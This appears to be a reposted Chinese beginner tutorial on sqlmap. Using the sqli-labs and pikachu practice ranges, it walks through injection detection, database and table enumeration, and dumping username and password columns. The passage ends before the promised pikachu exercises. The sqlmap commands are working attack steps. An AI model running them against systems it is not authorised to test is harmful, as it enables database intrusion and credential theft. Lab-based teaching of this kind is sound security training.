新手学习sqlmap入门这一篇就够了,注入实操
2022-10-14 10:57:4 Author: 白安全组(查看原文) 阅读量:19 收藏

前言:

Sqlmap我想大部分都很熟悉,这里简单介绍一下,帮不太熟悉的朋友简单了解一下。众所周知,top10名列前茅的漏洞就是注入漏洞,任何一个学习web渗透测试的朋友都需要了解的一个内容,注入分为手工注入和自动工具注入,而sqlmap就是自动工具中最好用的工具。那么直接进入主题。

这里我们使用靶场sql-labpikachu

http://wangehacker.cn/thanks.html

 靶场提供在我们的官网上,免费使用,免去一些新手的烦恼。

正文:

一、基本使用方式

首先我们要了解一下我们正常的注入的一个命令流程,我这里先演示最基本的一套流程

1、检测目标地址是否存在注入点。

这里使用的地址是我们网站的

http://wangehacker.cn/sqli-labs/Less-1/

这里我们需要在后面加上?id=1的传参

这里我们将这个网址直接扔到sqlmap中运行检测

s

qlmap -u "http://wangehacker.cn/sqli-labs/Less-1/?id=1" --batch

解释--batch是后面有一些选项我们选择默认选项

这里的命令是在kali中运行的,如果大家在Windows安装的sqlmap区别在红色部分

python sqlmap.py -u "http://wangehacker.cn/sqli-labs/Less-1/?id=1" --batch

这里就代表存在着注入漏洞,我们就需要进行下一步步骤,我们扫库名

2、检测数据库中的库名

我们使用命令

sqlmap -u "http://wangehacker.cn/sqli-labs/Less-1/?id=1" --batch --dbs

3、选择需要爆的库开始爆表名

使用命令选择我们需要爆破的库名,开始爆库中的表

sqlmap -u "http://wangehacker.cn/sqli-labs/Less-1/?id=1" --batch -D pikachu --tables

这里我们顺利拿到表名

4、指定库名,表名爆破字段

使用命令:

sqlmap -u "http://wangehacker.cn/sqli-labs/Less-1/?id=1" --batch -D pikachu -T users --columns

5、选择字段爆破字段中的内容

使用命令:

sqlmap -u "http://wangehacker.cn/sqli-labs/Less-1/?id=1" --batch -D pikachu -T users -C username,password --dump

这里我们的sqlmap会对一些简单的md5加密值进行破解。到这里五步我们的基本使用方式就已经完成了,下面我们利用pikachu靶场练习不同类型的注入。


文章来源: http://mp.weixin.qq.com/s?__biz=MzU4MjYxNTYwNA==&mid=2247486116&idx=1&sn=b89cc3aff776b2f3931fd51a74532af2&chksm=fdb4ddffcac354e9201b46661d264552e1600097ee3dc5106c6aedb56e1b0c741c318dcffae2#rd
如有侵权请联系:admin#unsafe.sh